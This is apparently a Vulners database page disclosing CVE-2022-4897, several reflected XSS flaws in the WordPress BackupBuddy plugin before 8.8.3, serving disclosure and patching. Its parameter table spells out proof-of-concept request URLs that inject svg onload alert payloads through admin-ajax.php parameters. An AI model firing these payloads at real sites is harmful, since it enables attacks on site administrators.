Vulners
Lucene search
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2022-4897 | 21 Feb 202312:21 | – | circl |
 | WordPress plugin BackupBuddy 跨站脚本漏洞 | 21 Feb 202300:00 | – | cnnvd |
 | CVE-2022-4897 BackupBuddy < 8.8.3 - Multiple Reflected Cross-Site Scripting | 21 Feb 202308:50 | – | cvelist |
 | EUVD-2022-52154 | 21 Feb 202308:50 | – | euvd |
 | WordPress BackupBuddy <8.8.3 - Cross Site Scripting | 28 Jun 202603:02 | – | nuclei |
 | CVE-2022-4897 | 21 Feb 202309:15 | – | nvd |
 | CVE-2022-4897 | 21 Feb 202309:15 | – | osv |
 | WordPress BackupBuddy Plugin < 8.8.3 is vulnerable to Cross Site Scripting (XSS) | 31 Jan 202300:00 | – | patchstack |
 | Cross site scripting | 21 Feb 202309:15 | – | prion |
 | PT-2023-15907 · WordPress · Backupbuddy | 21 Feb 202300:00 | – | ptsecurity |
10
Node
[
{
"vendor": "Unknown",
"product": "BackupBuddy",
"versions": [
{
"status": "affected",
"versionType": "custom",
"version": "0",
"lessThan": "8.8.3"
}
],
"defaultStatus": "unaffected"
}
]| Parameter | Position | Path | Description | CWE |
|---|---|---|---|---|
| step | request body | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=migrate_status | Reflected XSS via unsanitized step parameter in migrate_status function | CWE-79 |
| file | request body | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=remote_send | Reflected XSS via unsanitized file parameter in remote_send function | CWE-79 |
| archive | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&archive=--!><svg/onload=alert(/XSS/)>- | Reflected XSS via archive parameter in restore_file_view | CWE-79 |
| file | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=restore_file_view&file=--!><svg/onload=alert(/XSS/)>- | Reflected XSS via file parameter in restore_file_view | CWE-79 |
| serial | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=view_log&serial="><svg/onload=alert(/XSS/)> | Reflected XSS via serial parameter in view_log | CWE-79 |
| add | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)> | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| filter | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)> | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| callback_data | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&callback_data=</script><svg/onload=alert(/XSS/)> | Reflected XSS via destination_picker parameters (add, filter, callback_data) | CWE-79 |
| sending | query param | wp-admin/admin-ajax.php?action=pb_backupbuddy_backupbuddy&function=destination_picker&add=local&filter=local&sending=%3C/script%3E%3Csvg/onload=alert(/XSS/)%3E | Reflected XSS via sending parameter in destination_picker | CWE-79 |
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Jun 2026 05:22Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.00858
SSVC